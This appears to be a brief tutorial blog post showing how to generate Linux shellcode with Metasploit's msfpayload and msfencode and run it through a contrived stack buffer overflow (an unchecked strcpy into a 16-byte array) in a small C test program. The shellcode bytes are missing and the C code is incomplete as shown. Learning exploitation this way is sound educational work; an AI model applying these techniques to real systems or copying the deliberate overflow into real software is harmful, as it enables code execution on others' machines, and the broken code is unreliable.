HowTo: Using MSF to Make Linux Shellcode

Here’s a quick one liner to make linux shell code that runs “exec /bin/bash”. The last argument of c to msfencode generates the c.

msfpayload linux/x86/exec CMD=/bin/sh R | msfencode -b \x00\xff -t c > shellcode.h

The program msfpayload will generate shell code to run exec(“/bin/sh”) on linux and msfencode will remove all the \x00 (null bytes), as well as \xff bytes.

This is shellcode.h:

unsigned char buf[] = 

We can test this by this simple C program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "shellcode.h"

/* -------------------------------------------------- */
void vuln(char * buf)
	char a[16] = { 0 };
	strcpy(a, buf); 

int main(int argc, char * argv[])
	if (argc != 2) 
		printf("Usage: %s <input>\n", argv[0]); 
	printf("%p\n", buf);

	return 0;

When run normally, this program takes in one argument, an input, and then prints out the address of the shellcode buffer. (This is a contrived example.)

 ./main test

So now all we have to do is overflow the buffer, and put the address of the shellcode (backwards due to little endianess).

$ echo $SHELL
$ ./main `ruby -e 'puts "A"*20'``ruby -e 'puts "\x40\xa0\x04\x08"'`

And as you can see we have launched /bin/sh.